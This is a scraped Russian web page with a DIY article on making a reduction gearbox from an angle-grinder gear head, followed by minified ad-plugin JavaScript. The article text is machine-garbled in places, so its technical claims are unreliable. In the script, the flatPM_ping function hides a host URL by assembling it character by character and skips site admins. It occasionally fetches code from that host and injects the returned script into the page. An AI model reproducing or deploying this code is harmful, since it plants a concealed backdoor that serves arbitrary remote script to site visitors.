Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Самоделки Из Редуктора Болгарки

Обладатели домашних мастерских наделены множеством приспособлений и устройств, которые существенно упрощают ручную работу и увеличивают эффективность работы. Самым простым устройств является понижающий редуктор. В главном он употребляется если вы поставили цель скорость вращения выходного вала изменялась в наименьшую сторону либо повышался у него вращающий момент. По собственной конструкции это устройство вам больше понравятся комбинированным, червячным по другому шестеренным, также одно- и многоступенчатым. Понижающий редуктор наверное изготавливают на дому.

Данный механизм представляет из себя передаточное звено, которое размещается меж вращательными устройствами электродвигателя как еще его называют бензинового двигателя к конечному рабочему агрегату.

Основными характеризующими показателями редуктора являются:

  • передаваемая мощность;
  • КПД;
  • количество ведущих и ведомых вращательных валов.

К вращательным устройствам этого механизма бездвижно закрепляют зубчатые либо червячные передачи, которые передают и регулируют движение от одной книги к другому. В корпусе имеются отверстия с подшипниками, на каких размещаются валы.

Чтоб сделать редуктор требуются последующие материалы и инструменты:

гаечные ключи и отвертки различных форм и размеров;

  • надфили, сверла;
  • прокладки из резины;
  • шайбы, обрезки труб, шестерни, болты, подшипники, шкивы, валы;
  • инвертор;
  • штангенциркуль, линейка;
  • плоскогубцы;
  • тиски, молоток;
  • каркас от старенького редуктора как еще его называют железные листы.

    Важнейшей деталью понижающего редуктора считается его корпус. Он ожидается спроектирован и сделан верно самостоятельно, потому что это влияет на обоюдное положение валов и осей, соосность гнезд под опорные подшипники и зазоры меж шестернями.

    T2 | Установка редуктора от болгарки

    Читайте так же

    Корпусы промышленных редукторов изготавливают преимущественно способом литья из дюралевых сплавов иначе говоря чугуна, но, на дому это сделать совсем нереально. Потому под свои нужды можно найти либо доделать уже готовый корпус или сварить из железного листа. Только так следует держать в голове, что в течении сварки металл может «повести», поэтому для сохранения соосности валов нужно оставлять припуск.

    Наверное мастера делают по-другому. Чтоб не заморачиваться с расточными работами, они корпус начинают сваривать на сто процентов, а заместо гнезд для опорных подшипников используют отрезки трубы, которые выставляют в нужном положении и только впоследствии совсем закрепляют на одном месте с помощью сварки как еще его называют болтами. Для облегчения обслуживания редуктора нужно у корпуса сделать съемной верхнюю крышку, а снизу — сливное отверстие, которое будет употребляться для стока отработанного масла.

    Опорой для шестеренок служат оси и валы редуктора. Обычно в одноступенчатом механизме употребляют только валы, имеющих жесткое крепление шестерен. Обе шестеренки тогда крутятся вкупе с валами. Ось употребляют тогда, когда в редуктор нужно воткнуть промежную шестеренку. Она начинает свободно крутиться на собственной оси с наименьшим зазором, а чтоб не сдвигалась вбок, ее фиксируют гайкой, упрямым буртиком либо стопорными разрезными шайбами. Валы следует изготавливать из стали, обладающей неплохой прочностью и замечательно поддающейся механической обработке.

    Опорами для валов служат подшипники в редукторе. Они воспринимают нагрузки, возникающие при работе механизма. Надежность и работоспособность редуктора полностью зависит насколько верно были подобраны подшипники.

    Для механизма самостоятельно идеальнее всего подобрать подшипники закрытого типа, для которых требуется малое сервис. Они смазываются консистентной смазкой. Тип подшипников впрямую находится в зависимости от вида нагрузки. С применением прямозубых шестерен будет довольно обычных одно- иначе говоря двухрядных шариковых подшипников. Если в механизме находятся косозубые шестерни иначе говоря червячные передачи, то на вал и подшипники начинает передаваться осевая нагрузка, что просит наличия шарикового либо роликового радиально-упорного подшипника.

    СТАНОЧИЩЕ ИЗ РЕДУКТОРА БОЛГАРКИ и ДВИГАТЕЛЯ ОТ СТИРАЛКИ

    Другой достаточно принципиальной деталью редуктора являются шестерни. С их помощью есть вариант изменять частоту вращения выходного вала. Чтоб сделать шестерни, нужно особое металлорежущее оборудование, для экономии используются готовые детали со списанных устройств.

    Принципиально в течении монтажа шестерен выставить верно зазор у них, так как это влияет на уровень шума, возникающего в свое время работы редуктора и нагрузочная способность. Смазывать шестерни предпочтительнее водянистым промышленным маслом, которое заливают таким макаром, чтоб оно покрыло зубья одной из шестерни. Смазка других деталей осуществляется с помощью разбрызгивания масла по внутренней полости механизма.

    Читайте так же

    Сальниковые уплотнители валов предупреждают просачивание масла наружу из редуктора. Устанавливают их на выходах валов и закрепляют в подшипниковых крышках. Чтоб предупредить аварийное разрушение деталей механизма от огромных нагрузок употребляют предохранительную муфту. Она бывает в облике сильфона, подпружиненных фрикционных дисков либо срезаемого штифта. Процесс монтажа значительно упрощают крышки подшипников, которые бывают сквозными либо глухими. Подбирают их из готовых деталей как еще его называют вытачивают на токарном станке.

    Такой механизм является неподменным помощников в разных сферах деятельности человека. Обычно он применяется:

    • в индустрии;
    • в авто коробках;
    • в электрическом оборудовании и электроники;
    • в газодобывающей индустрии и других отраслях.

    В индустрии миф механизм употребляется очень обширно. В разных обрабатывающих станках он применяется как вращательная передающая деталь, повышающая скорость оборотов.

    Но в авто коробках редуктор, напротив, понижает частоту вращения мотора. Насколько верно отлажена его регулировка, зависит плавность и мягкость хода транспорта.

    Это понижающее обороты устройство употребляется также в бытовой технике и электрическом оборудовании, имеющих электродвигатели. Это будут миксеры, стиральные машины, дрели, кухонные комбайны, болгарки.

    Редукторы являются неподменной частью вентиляционного оборудования, очистных сооружений, насосных систем. Они содействуют поддержанию рационального давления газа в газопламенных установках.

    Газодобывающая индустрия также не способен обойтись без этого механизма. Транспортировка и хранение газов является достаточно небезопасным процессом, потому употребляют редуктор, используя который перекрывают доступ газа как еще его называют открывают ему выход, регулируя напор.

    Сборка редуктора своими силами из средств находящихся под рукой – дело достаточно хлопотное, однако не очень тяжелое. При его использовании миниатюризируется вращение выходного вала и возрастает его вращающий момент. Производительность устройств либо машины стопроцентно находится в зависимости от этой детали. Употребляется Данный механизм в разнообразных отраслях деятельности человека.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика